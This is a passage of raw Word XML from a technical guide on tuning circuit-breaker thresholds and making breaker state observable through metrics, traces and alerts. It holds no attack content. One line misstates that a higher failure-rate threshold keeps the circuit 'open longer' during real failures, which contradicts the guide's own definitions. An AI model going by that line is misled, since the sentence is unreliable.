        <w:t>9. Circuit Breaker Configuration — The Engineering of Thresholds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10172F5C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The False Positive / False Negative Trade-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64809AAF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>False positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit opens when the downstream is actually healthy. Traffic is unnecessarily rejected, fallbacks are served, users get degraded experience despite the downstream being fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB299B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>False negative:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit stays closed despite the downstream failing. Callers continue waiting for timeouts, resources are consumed, cascading failure risk grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37E6B8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The configuration parameters tune this trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9AD84A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failure_rate_threshold:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Higher threshold → fewer false positives (circuit opens less often), more false negatives (circuit stays open longer during real failures). Lower threshold → more false positives, fewer false negatives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168789C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Typical production values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7B789" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Critical financial services: 30–40% failure rate threshold (conservative — open early, accept more false positives).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778EBD2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Non-critical services: 60–70% failure rate threshold (lenient — tolerate more failures before opening).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBA417" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Internal services with high baseline error rates: 70–80% (some calls may always return expected errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2E72A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>minimum_number_of_calls:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The minimum sample size before evaluating the threshold. Too low (e.g., 5) → circuit opens on 3 failures out of 5 calls (60% rate) during a transient spike. Too high (e.g., 1000) → need 1000 calls to accumulate evidence, slow to detect failures during low-traffic periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB03D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Typical value: 10–20 calls.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> At 10 calls minimum, 5 failures required to trip the circuit (50% threshold). Statistically meaningful without requiring high call volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDF5F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sliding_window_size:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Larger window → more historical data, smoother failure rate, slower response to changing conditions. Smaller window → less historical data, more reactive, higher variance in failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7161CF6E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Count-based typical value: 50–100 calls.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Time-based typical value: 10–60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FB2D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wait_duration_in_open_state:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> How long to wait before testing recovery. As discussed: 30–60 seconds for most services. Longer for services known to take time to restart (JVM startup: 60–90 seconds, database initialization: 2–5 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C8999" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Statistical Validity Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33175B7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A failure rate of 50% from 4 failures out of 8 calls is statistically meaningless — the confidence interval is enormous. A 50% failure rate from 4,000 failures out of 8,000 calls is statistically meaningful — the true rate is within a few percentage points of 50%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221DD15C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The circuit breaker doesn't do proper statistical hypothesis testing</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — it applies a fixed threshold to a fixed-size window without confidence intervals. This is a deliberate engineering trade-off: statistical rigor requires complex computation and larger sample sizes, creating latency in failure detection. The simple threshold approach is fast, predictable, and good enough in practice because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF58611" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The failure rates during real outages are typically extreme (80–100%), not marginal (51%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22253D9A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The cost of a false positive (brief service degradation) is much lower than the cost of a false negative (cascading failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B90781" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker transitions back to CLOSED quickly if the false positive is detected in HALF-OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A618914" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="6557B0B3">
          <v:rect id="_x0000_i4111" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD473FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Observability — Making Circuit Breaker State Visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372CC2A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The State Visibility Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F2885" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A circuit breaker that's silently open causes mysterious failures from the user's perspective. Effective observability transforms the circuit breaker from a black box into a visible, understandable component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92582D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metrics — What to Track</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D725D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State gauge (most critical):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09294696" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F859215" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state{service="payment", circuit="default"} 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241DBD7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  // 0=CLOSED, 1=OPEN, 2=HALF_OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B8107" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Alert on any transition to OPEN: circuit_breaker_state == 1 for more than 60 seconds → page the on-call team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1ACAD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure rate trend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A5F75" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CFA07" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_failure_rate{service="payment"} 23.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC08EF2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Alert on rapid increase: failure rate increasing by &gt;10% per minute → escalating failure, circuit may open soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938C0CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Call volume by outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148F9E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A7B158" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_calls_total{service="payment", outcome="success"} 8743</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B26B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_calls_total{service="payment", outcome="failure"} 2431</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918A7E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_calls_total{service="payment", outcome="not_permitted"} 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDFA99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_calls_total{service="payment", outcome="slow"} 312</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B38378" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A high not_permitted count indicates the circuit has been open recently (or is currently open). A rising slow count is a leading indicator of approaching circuit opening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC75BCD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State transition events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31198CB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37CF4D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state_transition_total{service="payment", from="CLOSED", to="OPEN"} 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441884C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state_transition_total{service="payment", from="OPEN", to="HALF_OPEN"} 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9BA66" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state_transition_total{service="payment", from="HALF_OPEN", to="CLOSED"} 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960D68A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state_transition_total{service="payment", from="HALF_OPEN", to="OPEN"} 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53132CCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Three transitions to OPEN suggests the circuit has been cycling — the downstream is intermittently failing. Two successful closures vs one re-opening suggests the service is recovering but not stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA5E96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Tracing Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB571E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker activity should be visible in distributed traces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849DD56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For permitted calls (CLOSED):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BCF201" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9CC7F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Span: call-payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFF9AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Status: success/failure (mirrors actual call outcome)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609CBAA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  circuit_breaker.state: CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D741F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  circuit_breaker.failure_rate: 23.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F799" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For rejected calls (OPEN):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C66D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B26A80" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Span: call-payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC77E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Status: error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980DD18" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  error.type: CircuitBreakerOpenException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEA515" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  circuit_breaker.state: OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FFD56B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  circuit_breaker.failure_rate: 67.3  (the rate that tripped it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB4BF4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  fallback.used: cached_response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348DA090" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  fallback.cache_age: 45s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385594BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The trace immediately shows: this request failed because the circuit is open, not because of a new downstream failure. The on-call engineer sees this context without checking logs or asking "why is payment service returning errors?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46383476" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event-Driven Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75415ADF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Subscribe to circuit breaker state change events for real-time alerting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67480C34" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52091602" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Event: CircuitBreakerStateTransitionEvent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E32E1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  circuit_name: "payment-service",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12A7A5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  from_state: CLOSED,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB650D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  to_state: OPEN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048112A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate: 67.3%,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C72FA1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  number_of_buffered_calls: 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B163E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  timestamp: 2024-01-15T10:30:45Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601131CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB040E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="1AB6463E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>→ Publish to PagerDuty, Slack #incidents, incident management system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB18313" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>→ Update status page: "Payment service experiencing issues"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFE65D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>→ Trigger runbook automation: check payment service logs, alert payment team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395BF33" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>The circuit breaker state change is a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
